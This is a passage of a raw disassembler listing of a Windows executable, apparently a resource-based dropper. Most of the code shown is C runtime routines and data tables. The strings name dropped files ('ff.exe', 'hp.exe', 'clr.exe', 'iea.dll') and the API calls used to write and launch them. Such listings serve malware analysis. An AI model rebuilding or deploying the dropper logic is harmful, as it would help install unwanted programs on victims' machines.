leave
retn
; ---------------------------------------------------------------------------
loc_404D2F: ; CODE XREF: sub_404CC2+D�j
cmp dword_407290, 1
jle short loc_404D44
push 8
push ecx
call sub_404D94
pop ecx
pop ecx
leave
retn
; ---------------------------------------------------------------------------
loc_404D44: ; CODE XREF: sub_404CC2+74�j
mov eax, off_407280
movzx eax, byte ptr [eax+ecx*2]
and eax, 8
leave
retn
sub_404CC2 endp
; ---------------------------------------------------------------------------
align 10h
mov eax, [esp+8]
mov ecx, [esp+10h]
or ecx, eax
mov ecx, [esp+0Ch]
jnz short loc_404D79
mov eax, [esp+4]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_404D79: ; CODE XREF: .text:00404D6E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+8]
mul dword ptr [esp+14h]
add ebx, eax
mov eax, [esp+8]
mul ecx
add edx, ebx
pop ebx
retn 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404D94 proc near ; CODE XREF: sub_404CC2+79�p
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_404DB2
mov ecx, off_407280
movzx eax, word ptr [ecx+eax*2]
jmp short loc_404E0D
; ---------------------------------------------------------------------------
loc_404DB2: ; CODE XREF: sub_404D94+10�j
mov ecx, eax
sar ecx, 8
push esi
mov esi, off_407280
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_404DD8
push 2
mov [ebp+var_3], al
mov [ebp+var_4], cl
mov [ebp+var_2], 0
pop eax
jmp short loc_404DE2
; ---------------------------------------------------------------------------
loc_404DD8: ; CODE XREF: sub_404D94+33�j
mov [ebp+var_4], al
xor eax, eax
mov [ebp+var_3], 0
inc eax
loc_404DE2: ; CODE XREF: sub_404D94+42�j
push 1
push dword_407480
lea ecx, [ebp+arg_0+2]
push dword_407490
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_404386
add esp, 1Ch
test eax, eax
jnz short loc_404E09
leave
retn
; ---------------------------------------------------------------------------
loc_404E09: ; CODE XREF: sub_404D94+71�j
movzx eax, word ptr [ebp+arg_0+2]
loc_404E0D: ; CODE XREF: sub_404D94+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_404D94 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404E12 proc near ; CODE XREF: sub_40270C+13�p
jmp ds:dword_4050B0
sub_404E12 endp
; ---------------------------------------------------------------------------
align 200h
_text ends
; Section 2. (virtual address 00005000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00005000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 405000h
dword_405000 dd 77E77963h ; DATA XREF: sub_401000+6E�r
; sub_401000:loc_40107A�r
dword_405004 dd 77E79D8Ch ; DATA XREF: sub_401000+63�r
; sub_4018FC+155�r
dword_405008 dd 77E7A837h ; DATA XREF: sub_401000+4C�r
dword_40500C dd 77E7C931h ; DATA XREF: sub_401000+2D�r
dword_405010 dd 77E7105Fh ; DATA XREF: sub_401000+24�r
dword_405014 dd 77E760B5h ; DATA XREF: sub_401000+1A�r
dword_405018 dd 77E6CA8Ah ; DATA XREF: sub_401000+10�r
dword_40501C dd 77E645E4h ; DATA XREF: sub_401090+16D�r
dword_405020 dd 77E6AD34h ; DATA XREF: sub_401090+9E�r
dword_405024 dd 77E80618h ; DATA XREF: sub_401090+98�r
dword_405028 dd 77E7A5FDh ; DATA XREF: sub_401090+8B�r
; sub_401761+15�r ...
dword_40502C dd 77E805D8h ; DATA XREF: sub_401090+7D�r
; sub_40234D+18�r
dword_405030 dd 77E74155h ; DATA XREF: sub_401090+55�r
dword_405034 dd 77E73BEFh ; DATA XREF: sub_401090+4F�r
dword_405038 dd 77E704FCh ; DATA XREF: sub_401090+37�r
dword_40503C dd 77E7A099h ; DATA XREF: sub_401090+24�r
; .text:00401544�r ...
dword_405040 dd 77E6169Ah ; DATA XREF: sub_404B0C+D5�r
dword_405044 dd 77E7513Ch ; DATA XREF: sub_404900+20�r
dword_405048 dd 77E75CB5h ; DATA XREF: sub_40124E-7�r
; sub_401761+29�r
dword_40504C dd 77E79F93h ; DATA XREF: .text:004012EE�r
; sub_401761+5�r
dword_405050 dd 77E6177Ah ; DATA XREF: .text:004013E1�r
; sub_402071+57�r
dword_405054 dd 77E7C938h ; DATA XREF: .text:loc_40138D�r
dword_405058 dd 77E7C657h ; DATA XREF: .text:004012A1�r
dword_40505C dd 77E802FCh ; DATA XREF: sub_40145D+43�r
dword_405060 dd 77E7751Ah ; DATA XREF: sub_40145D+37�r
dword_405064 dd 77E77CC4h ; DATA XREF: sub_40145D+2F�r
dword_405068 dd 77E80656h ; DATA XREF: sub_40145D+27�r
dword_40506C dd 77E6167Bh ; DATA XREF: sub_40145D+1B�r
dword_405070 dd 77E616B4h ; DATA XREF: sub_4017FB+1A�r
dword_405074 dd 77E79C90h ; DATA XREF: sub_4017FB+13�r
dword_405078 dd 77E79C3Dh ; DATA XREF: sub_4018FC+14E�r
; sub_402071+157�r
dword_40507C dd 77EB9A84h ; DATA XREF: sub_401AAC+167�r
dword_405080 dd 77E9C5B1h ; DATA XREF: sub_401F4F+113�r
dword_405084 dd 77E67702h ; DATA XREF: sub_401F4F:loc_402026�r
dword_405088 dd 77E7C9E1h ; DATA XREF: sub_401F4F+C1�r
dword_40508C dd 77E79924h ; DATA XREF: sub_401F4F:loc_401FBE�r
; sub_403FCA+22D�r ...
dword_405090 dd 77F5157Dh ; DATA XREF: sub_401F4F:loc_401F7F�r
; sub_403FCA:loc_404003�r ...
dword_405094 dd 77E77EE1h ; DATA XREF: sub_401F4F+B�r
dword_405098 dd 77E7C931h ; DATA XREF: sub_402071+19C�r
dword_40509C dd 77E78406h ; DATA XREF: sub_402071+FE�r
; sub_402071+165�r
dword_4050A0 dd 77E76E0Bh ; DATA XREF: sub_4022BE+44�r
dword_4050A4 dd 77E7C726h ; DATA XREF: sub_4022BE+11�r
dword_4050A8 dd 77E79E34h ; DATA XREF: sub_403380+22F�r
dword_4050AC dd 77F51597h ; DATA XREF: sub_402F0B+30�r
; sub_403380+2B4�r ...
dword_4050B0 dd 77F6183Eh ; DATA XREF: sub_404E12�r
dword_4050B4 dd 77E775F1h ; DATA XREF: sub_4027FA+131�r
; sub_4027FA+196�r ...
dword_4050B8 dd 77E7F044h ; DATA XREF: sub_4027FA+B3�r
; sub_404B0C+1A�r ...
dword_4050BC dd 77E7A13Fh ; DATA XREF: sub_402D07+42�r
dword_4050C0 dd 77E6C703h ; DATA XREF: sub_402D07+2B�r
dword_4050C4 dd 77E7849Fh ; DATA XREF: sub_402B7B+1C�r
; sub_402D07+93�r ...
dword_4050C8 dd 77F516F8h ; DATA XREF: sub_402F43+3E�r
; sub_40330D+D�r ...
dword_4050CC dd 77E7980Ah ; DATA XREF: sub_403698+7E�r
; sub_40374F+52�r ...
dword_4050D0 dd 77F5722Fh ; DATA XREF: sub_403698+27�r
; sub_403E30+FD�r ...
dword_4050D4 dd 77F522F2h ; DATA XREF: sub_403F92+30�r
dword_4050D8 dd 77E77405h ; DATA XREF: sub_403FCA+2C3�r
; sub_403FCA+344�r ...
dword_4050DC dd 77E77CCEh ; DATA XREF: sub_403FCA+C0�r
; sub_403FCA+141�r ...
dword_4050E0 dd 77E781F9h ; DATA XREF: sub_403FCA+27�r
; sub_403FCA+15B�r ...
dword_4050E4 dd 77E641EBh ; DATA XREF: sub_404386+19C�r
dword_4050E8 dd 77E7C866h ; DATA XREF: sub_404386+24�r
; sub_404386+128�r
dword_4050EC dd 77E7C3A5h ; DATA XREF: sub_404B0C+2B�r
dd 0
dword_4050F4 dd 77428B97h ; DATA XREF: sub_401090+CA�r
dd 3 dup(0)
aTo0f db 'âo0F',0
align 4
dd 2, 52h, 2 dup(5D80h)
aFf_exe db '\ff.exe',0 ; DATA XREF: sub_401090+130�o
aHp_exe db '\hp.exe',0 ; DATA XREF: sub_401090+F3�o
aOpen db 'open',0 ; DATA XREF: sub_401090+DE�o
; sub_401090+11B�o ...
align 4
aClr_exe db '\clr.exe',0 ; DATA XREF: sub_401090+B0�o
align 10h
aDllregisterser db 'DllRegisterServer',0 ; DATA XREF: sub_401090+85�o
align 4
aIea_dll db '\iea.dll',0 ; DATA XREF: sub_401090+5B�o
align 10h
stru_405160 _msEH <0FFFFFFFFh, offset sub_40123A, offset sub_40123E>
; DATA XREF: sub_40124E-2F�o
align 10h
stru_405170 _msEH <0FFFFFFFFh, offset sub_401423, offset sub_401437>
; DATA XREF: .text:00401283�o
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: .text:004015F5�o
; sub_4018FC+123�o
align 4
aProgram db 'Program: ',0 ; DATA XREF: .text:004015CB�o
align 10h
asc_4051B0 db 0Ah ; DATA XREF: .text:004015BF�o
; sub_4018FC+107�o
db 0Ah,0
align 4
a___ db '...',0 ; DATA XREF: .text:0040158F�o
; sub_4018FC+C1�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: .text:0040154E�o
; sub_4018FC+8E�o
align 10h
aABufferOverrun db 'A buffer overrun has been detected which has corrupted the progra'
; DATA XREF: .text:00401525�o
db 'm',27h,'s',0Ah
db 'internal state. The program cannot safely continue execution and'
db ' must',0Ah
db 'now be terminated.',0Ah,0
aBufferOverrunD db 'Buffer overrun detected!',0 ; DATA XREF: .text:loc_401520�o
align 10h
aASecurityError db 'A security error of unknown cause has been detected which has',0Ah
; DATA XREF: .text:0040150F�o
db 'corrupted the program',27h,'s internal state. The program cannot sa'
db 'fely',0Ah
db 'continue execution and must now be terminated.',0Ah,0
align 4
aUnknownSecurit db 'Unknown security failure detected!',0 ; DATA XREF: .text:0040150A�o
align 4
stru_405368 _msEH <0FFFFFFFFh, offset sub_4014FB, offset sub_4014FF>
; DATA XREF: .text:004014C8�o
aCorexitprocess db 'CorExitProcess',0 ; DATA XREF: sub_401761+F�o
align 4
aMscoree_dll db 'mscoree.dll',0 ; DATA XREF: sub_401761�o
aRuntimeError db 'runtime error ',0
align 10h
db 0Dh,0Ah,0
align 4
aTlossError db 'TLOSS error',0Dh,0Ah,0
align 4
aSingError db 'SING error',0Dh,0Ah,0
align 4
aDomainError db 'DOMAIN error',0Dh,0Ah,0
align 8
aR6029ThisAppli db 'R6029',0Dh,0Ah
db '- This application cannot run using the active version of the Mic'
db 'rosoft .NET Runtime',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 4
aR6028UnableToI db 'R6028',0Dh,0Ah
db '- unable to initialize heap',0Dh,0Ah,0
align 4
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 10h
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aThisApplicatio db 0Dh,0Ah
db 'This application has requested the Runtime to terminate it in an '
db 'unusual way.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 4
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 10h
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .data:off_407044�o
db '- floating point not loaded',0Dh,0Ah,0
align 4
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_4018FC+F5�o
db 0Ah
db 'Program: ',0
word_405752 dw 0 ; DATA XREF: sub_401C1D+1B�o
align 8
stru_405758 _msEH <0FFFFFFFFh, offset loc_402249, offset loc_40224D>
; DATA XREF: sub_40221C+2�o
align 8
stru_405768 _msEH <0FFFFFFFFh, offset sub_40228D, offset sub_402291>
; DATA XREF: .text:00402262�o
aGetprocesswind db 'GetProcessWindowStation',0 ; DATA XREF: sub_40234D+73�o
aGetuserobjecti db 'GetUserObjectInformationA',0 ; DATA XREF: sub_40234D+62�o
align 4
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_40234D+47�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_40234D+3F�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_40234D+2E�o
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_40234D+13�o
align 4
dd 41h dup(0)
asc_4058E8: ; DATA XREF: .data:off_407280�o
unicode 0, < ((((( H>
dw 10h
dd 7 dup(100010h), 5 dup(840084h), 3 dup(100010h), 810010h
dd 2 dup(810081h), 10081h, 9 dup(10001h), 100001h, 2 dup(100010h)
dd 820010h, 2 dup(820082h), 20082h, 9 dup(20002h), 100002h
dd 100010h, 200010h, 40h dup(0)
dword_405AE8 dd 200000h, 4 dup(200020h), 280068h, 280028h, 200028h
; DATA XREF: .data:00407284�o
dd 8 dup(200020h), 480020h, 7 dup(100010h), 840010h, 4 dup(840084h)
dd 100084h, 3 dup(100010h), 3 dup(1810181h), 0Ah dup(1010101h)
dd 3 dup(100010h), 3 dup(1820182h), 0Ah dup(1020102h)
dd 2 dup(100010h), 10h dup(200020h), 480020h, 8 dup(100010h)
dd 140010h, 100014h, 2 dup(100010h), 100014h, 2 dup(100010h)
dd 1010010h, 0Bh dup(1010101h), 1010010h, 3 dup(1010101h)
dd 0Ch dup(1020102h), 1020010h, 3 dup(1020102h), 1010102h
dword_405CEC dd 0 ; DATA XREF: sub_403FCA+1C�o
; sub_404386+1E�o
stru_405CF0 _msEH <0FFFFFFFFh, offset loc_4042C3, offset loc_4042C7>
; DATA XREF: sub_403FCA+2�o
dd 0FFFFFFFFh, 4040C0h, 4040C4h, 0FFFFFFFFh, 40418Eh, 404192h
dd 0
stru_405D18 _msEH <0FFFFFFFFh, offset loc_40445F, offset loc_404463>
; DATA XREF: sub_404386+2�o
align 8
stru_405D28 _msEH <0FFFFFFFFh, offset loc_404A15, offset loc_404A19>
; DATA XREF: sub_404943+2�o
align 8
dd 48h, 0Eh dup(0)
dd offset dword_407030
dd offset dword_405DE0
dd 2, 53445352h, 0BEEBAFAAh, 425BF78Dh, 3B28229Ch, 50120460h
dd 1
aPProjectsKlikt db 'p:\Projects\Kliktanje\FileInstall\Release\FileInstall.pdb',0
align 10h
dword_405DE0 dd 1660h, 272Ch, 0 ; DATA XREF: .rdata:00405D78�o
dword_405DEC dd 2 dup(0) ; DATA XREF: sub_40221C+C�o
; sub_40221C:loc_40222F�o
dword_405DF4 dd 0 ; DATA XREF: .text:0040226C�o
; sub_402291:loc_402273�o
dd offset dword_405F24
dd 2 dup(0)
dd offset dword_405F24
dd offset dword_405F24
dd offset dword_405F2C
dd 2 dup(0)
dd offset dword_405F2C
dd offset dword_405F2C
dd 5 dup(0)
dd 5F30h, 5F3Eh, 5F4Ah, 5F58h, 5F68h, 5F7Ah, 5F8Ah, 5F9Ah
dd 5FA8h, 5FB8h, 5FC6h, 5FD8h, 5FE8h, 5FF4h, 6000h, 6016h
dd 6348h, 6336h, 6056h, 6064h, 6078h, 608Ah, 609Ch, 60ACh
dd 60C6h, 60D6h, 60ECh, 6102h, 611Ch, 6130h, 6144h, 6154h
dd 6170h, 618Ah, 61A2h, 61BCh, 61D2h, 61E2h, 61FCh, 620Eh
dd 621Ch, 622Ah, 6238h, 6246h, 6252h, 625Eh, 6274h, 6284h
dd 628Eh, 629Ah, 62A6h, 62B2h, 62C2h, 62D0h, 62DCh, 62ECh
dd 6302h, 6312h, 6324h, 635Ah
dword_405F24 dd 0 ; DATA XREF: .rdata:00405DF8�o
; .rdata:00405E04�o ...
dd 603Ah
dword_405F2C dd 0 ; DATA XREF: .rdata:00405E0C�o
; .rdata:00405E18�o ...
db 2Eh ; .
align 2
aClosehandle db 'CloseHandle',0
dw 394h
aWritefile db 'WriteFile',0
aM db 'M',0
aCreatefilea db 'CreateFileA',0
db 5Bh ; [
db 2, 4Ch, 6Fh
aCkresource db 'ckResource',0
align 4
db 46h ; F
db 3, 53h, 69h
aZeofresource db 'zeofResource',0
align 2
dw 24Dh
aLoadresource db 'LoadResource',0
align 2
db 'Ú',0
aFindresourcea db 'FindResourceA',0
dw 265h
aMovefileexa db 'MoveFileExA',0
db 0CBh ; Ë
db 1, 47h, 65h
aTtemppatha db 'tTempPathA',0
align 4
aQ db 'ï',0
aFreelibrary db 'FreeLibrary',0
dw 198h
aGetprocaddress db 'GetProcAddress',0
align 4
db 48h ; H
db 2, 4Ch, 6Fh
aAdlibrarya db 'adLibraryA',0
align 4
db 0ADh ;
db 3, 6Ch, 73h
aTrcata db 'trcatA',0
align 4
db 0B9h ; ¹
db 3, 6Ch, 73h
aTrcpyna db 'trcpynA',0
db 0B9h ; ¹
db 1, 47h, 65h
aTsystemdirecto db 'tSystemDirectoryA',0
dw 175h
aGetmodulefilen db 'GetModuleFileNameA',0
align 4
aKernel32_dll db 'KERNEL32.dll',0
align 2
dw 106h
aShellexecutea db 'ShellExecuteA',0
aShell32_dll db 'SHELL32.dll',0
aP db '¯',0
aExitprocess db 'ExitProcess',0
db 77h ; w
db 1, 47h, 65h
aTmodulehandlea db 'tModuleHandleA',0
align 4
db 0AFh ; ¯
db 1, 47h, 65h
aTstartupinfoa db 'tStartupInfoA',0
dw 108h
aGetcommandline db 'GetCommandLineA',0
db 0DFh ; ß
db 1, 47h, 65h
aTversionexa db 'tVersionExA',0
db 97h ; —
db 2, 51h, 75h
aEryperformance db 'eryPerformanceCounter',0
dw 1D5h
aGettickcount db 'GetTickCount',0
align 2
dw 13Eh
aGetcurrentthre db 'GetCurrentThreadId',0
align 4
db 3Bh ; ;
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcessId',0
dw 1C0h
aGetsystemtimea db 'GetSystemTimeAsFileTime',0
db 4Fh ; O
db 3, 54h, 65h
aRminateprocess db 'rminateProcess',0
align 10h
db 3Ah ; :
db 1, 47h, 65h
aTcurrentproc_0 db 'tCurrentProcess',0
db 0B1h ; ±
db 1, 47h, 65h
aTstdhandle db 'tStdHandle',0
align 4
db 60h ; `
db 3, 55h, 6Eh
aHandledexcepti db 'handledExceptionFilter',0
align 10h
aA db 'í',0
aFreeenvironmen db 'FreeEnvironmentStringsA',0
dw 14Dh
aGetenvironment db 'GetEnvironmentStrings',0
aU db 'î',0
aFreeenvironm_0 db 'FreeEnvironmentStringsW',0
db 87h ; ‡
db 3, 57h, 69h
aDechartomultib db 'deCharToMultiByte',0
dw 169h
aGetlasterror db 'GetLastError',0
align 2
dw 14Fh
aGetenvironme_0 db 'GetEnvironmentStringsW',0
align 4
dd 65530317h, 6E614874h, 43656C64h, 746E756Fh, 15E0000h
dd 46746547h, 54656C69h, 657079h, 6548020Ah, 65447061h
dd 6F727473h, 2080079h, 70616548h, 61657243h, 6574h, 69560376h
dd 61757472h, 6572466Ch, 20C0065h, 70616548h, 65657246h
dd 2CA0000h, 556C7452h, 6E69776Eh, 21F0064h
aInterlockedexc db 'InterlockedExchange',0
db 7Bh ; {
db 3, 56h, 69h
aRtualquery db 'rtualQuery',0
align 4
db 0F5h ; õ
align 2
aGetacp db 'GetACP',0
align 2
dw 18Bh
aGetoemcp db 'GetOEMCP',0
align 2
dw 0FCh
aGetcpinfo db 'GetCPInfo',0
dw 206h
aHeapalloc db 'HeapAlloc',0
dw 373h
aVirtualalloc db 'VirtualAlloc',0
align 2
dw 210h
aHeaprealloc db 'HeapReAlloc',0
db 12h
db 2, 48h, 65h
aApsize db 'apSize',0
align 4
db 3Ah ; :
db 2, 4Ch, 43h
aMapstringa db 'MapStringA',0
align 4
db 6Bh ; k
db 2, 4Dh, 75h
aLtibytetowidec db 'ltiByteToWideChar',0
dw 23Bh
aLcmapstringw db 'LCMapStringW',0
align 2
dw 1B2h
aGetstringtypea db 'GetStringTypeA',0
align 4
dd 654701B5h, 72745374h, 54676E69h, 57657079h, 16C0000h
dd 4C746547h, 6C61636Fh, 666E4965h, 416Fh, 69560379h, 61757472h
dd 6F72506Ch, 74636574h, 1BB0000h, 53746547h, 65747379h
dd 666E496Dh, 6Fh, 325h dup(0)
_rdata ends
; Section 3. (virtual address 00007000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00007000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 407000h
dword_407000 dd 0 ; DATA XREF: sub_401761+75�o
dd offset sub_40145D
dword_407008 dd 0 ; DATA XREF: sub_401761+7C�o
dword_40700C dd 0 ; DATA XREF: sub_401761+42�o
dd offset sub_402AB7
dd offset sub_402EED
dword_407018 dd 0 ; DATA XREF: sub_401761+47�o
dword_40701C dd 0 ; DATA XREF: sub_4017FB:loc_401862�o
dword_407020 dd 0 ; DATA XREF: sub_4017FB+6C�o
dword_407024 dd 0 ; CODE XREF: sub_401761+23�p
; DATA XREF: sub_4017FB:loc_401881�o
dword_407028 dd 2 dup(0) ; DATA XREF: sub_4017FB+8B�o
dword_407030 dd 0FCEE04D4h ; DATA XREF: sub_401090+6�r sub_40124E�r ...
off_407034 dd offset sub_4018CD ; DATA XREF: sub_40125C+1C�r
dword_407038 dd 2 ; DATA XREF: sub_4018FC+58�r
; sub_401A73+E�r
align 10h
dword_407040 dd 2 ; DATA XREF: sub_4018FC:loc_401922�r
; sub_4018FC+3A�r
off_407044 dd offset aR6002FloatingP ; DATA XREF: sub_4018FC+D5�r
; sub_4018FC+112�r ...
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 4056E4h, 9, 4056B8h, 0Ah, 405620h, 10h, 4055F4h
dd 11h, 4055C4h, 12h, 4055A0h, 13h, 405574h, 18h, 40553Ch
dd 19h, 405514h, 1Ah, 4054DCh, 1Bh, 4054A4h, 1Ch, 40547Ch
dd 1Dh, 4053D8h, 78h, 4053C4h, 79h, 4053B4h, 7Ah, 4053A4h
dd 0FCh, 4053A0h, 0FFh, 405390h
dword_4070D8 dd 0C0000005h, 0Bh, 0 ; DATA XREF: sub_401AAC+C�o
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
dd 0C000008Dh, 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
dd 0C0000090h, 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_407150 dd 3 ; DATA XREF: sub_401AAC+84�r
dword_407154 dd 7 ; DATA XREF: sub_401AAC+89�r
dword_407158 dd 0Ah ; DATA XREF: sub_401AAC+6�r
dword_40715C dd 8Ch ; DATA XREF: sub_401AAC+B2�r
; sub_401AAC+BA�w ...
dd 0FFFFFFFFh, 0A80h, 10h, 0
dword_407170 dd 19930520h, 3 dup(0) ; DATA XREF: .text:004027DB�o
; sub_4027E2+2�o
byte_407180 db 1 ; DATA XREF: sub_402D07+120�r
db 2, 4, 8
align 8
dword_407188 dd 3A4h ; DATA XREF: sub_402D07:loc_402D82�r
dword_40718C dd 82798260h ; DATA XREF: sub_402D07+15C�r
dd 21h, 0
dword_407198 dd 0DFA6h ; DATA XREF: sub_402D07+100�r
align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 3 dup(0)
off_407280 dd offset asc_4058E8 ; DATA XREF: sub_402ADF+18�r
; sub_404CC2:loc_404D44�r ...
; " ((((( H"
dd offset dword_405AE8+2
dd 1, 0
dword_407290 dd 1 ; DATA XREF: sub_404CC2:loc_404D2F�r
dd 2Eh, 1, 0
dword_4072A0 dd 0 ; DATA XREF: .text:0040139D�w
; sub_401C7A:loc_401C8C�r ...
align 8
dword_4072A8 dd 0 ; DATA XREF: sub_40125C�r
; .text:00401353�r ...
dword_4072AC dd 0 ; DATA XREF: .text:004014DA�r
dd 3 dup(0)
dword_4072BC dd 2 ; DATA XREF: .text:004012AA�w
; sub_4022A4�r ...
dword_4072C0 dd 0A28h ; DATA XREF: .text:004012CA�w
; .text:004012DB�w
dword_4072C4 dd 501h ; DATA XREF: .text:004012E6�w
dword_4072C8 dd 5 ; DATA XREF: .text:004012B3�w
; sub_4022A4+9�r ...
dword_4072CC dd 1 ; DATA XREF: .text:004012BB�w
dword_4072D0 dd 1 ; DATA XREF: sub_401EAD+8F�w
dword_4072D4 dd 370B20h ; DATA XREF: sub_401EAD+95�w
dd 0
dword_4072DC dd 370B40h ; DATA XREF: sub_401C7A+48�w
; sub_401C7A:loc_401D2B�r ...
dd 3 dup(0)
off_4072EC dd offset aCM_unpackerPac ; DATA XREF: sub_401EAD+37�w
; "C:\\m_unpacker\\packed.exe"
dd 0
byte_4072F4 db 0 ; DATA XREF: sub_4017FB+2D�w
align 4
dword_4072F8 dd 1 ; DATA XREF: sub_4017FB+27�w
dword_4072FC dd 1 ; DATA XREF: sub_4017FB+7�r
; sub_4017FB+B0�w
dword_407300 dd 0 ; DATA XREF: sub_401A73+21�r
dword_407304 dd 0 ; DATA XREF: sub_401AAC+68�r
; sub_401AAC+73�w ...
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_401EAD+1C�o
; .data:off_4072EC�o
align 4
dd 3Ah dup(0)
byte_40740C db 0 ; DATA XREF: sub_401EAD+23�w
align 10h
dword_407410 dd 1 ; DATA XREF: sub_401F4F+2�r
; sub_401F4F+24�w ...
dword_407414 dd 0 ; DATA XREF: sub_40234D+9�r
; sub_40234D+38�w ...
dword_407418 dd 0 ; DATA XREF: sub_40234D+4D�w
; sub_40234D:loc_402412�r
dword_40741C dd 0 ; DATA XREF: sub_40234D+5B�w
; sub_40234D+D6�r
dword_407420 dd 0 ; DATA XREF: sub_40234D+7B�w
; sub_40234D:loc_4023CD�r
dword_407424 dd 0 ; DATA XREF: sub_40234D+6C�w
; sub_40234D+9C�r
dword_407428 dd 0 ; DATA XREF: sub_4027FA:loc_402881�r
; sub_4027FA+13F�r ...
align 10h
dword_407430 dd 0 ; DATA XREF: sub_4027FA:loc_402894�r
; sub_4027FA+1C4�r ...
dd 0Fh dup(0)
dword_407470 dd 0 ; DATA XREF: sub_4027FA+12C�o
; sub_4027FA+191�o ...
dword_407474 dd 1 ; DATA XREF: sub_402D07+19�w
; sub_402D07+21�w ...
align 10h
dword_407480 dd 0 ; DATA XREF: sub_403FCA+265�r
; sub_404386+14A�r ...
align 10h
dword_407490 dd 0 ; DATA XREF: sub_402D07+4F�r
; sub_403FCA+9D�r ...
align 8
dword_407498 dd 1 ; DATA XREF: sub_403FCA+E�r
; sub_403FCA+31�w ...
dword_40749C dd 1 ; DATA XREF: sub_404386+E�r
; sub_404386+2E�w ...
dword_4074A0 dd 0 ; DATA XREF: sub_404540�r
dword_4074A4 dd 0 ; DATA XREF: sub_402FB5�r
; sub_403E30:loc_403F39�r ...
dword_4074A8 dd 0 ; DATA XREF: sub_40330D+21�w
; sub_403380+21C�r ...
dword_4074AC dd 0 ; DATA XREF: sub_40330D+28�w
; sub_403355�r ...
dword_4074B0 dd 0 ; DATA XREF: sub_40330D+15�w
; sub_403355+8�r ...
dword_4074B4 dd 0 ; DATA XREF: sub_402F43+E�r
; sub_40330D+36�w ...
dword_4074B8 dd 0 ; DATA XREF: sub_40330D+2F�w
; sub_403380+300�w ...
dword_4074BC dd 0 ; DATA XREF: sub_40330D+3C�w
; sub_403698+5�r ...
dword_4074C0 dd 0 ; DATA XREF: sub_403380+229�r
; sub_403380+249�r ...
dword_4074C4 dd 0 ; DATA XREF: sub_402B52+1A�w
; sub_402B7B+84�r ...
dword_4074C8 dd 0 ; DATA XREF: sub_402B52+15�w
; sub_402D07+14D�w ...
dd 5 dup(0)
byte_4074E0 db 0 ; DATA XREF: sub_402B52+6�o
; sub_402D07+A7�o ...
byte_4074E1 db 0 ; DATA XREF: sub_401D41+47�r
; sub_401D41+11D�r ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
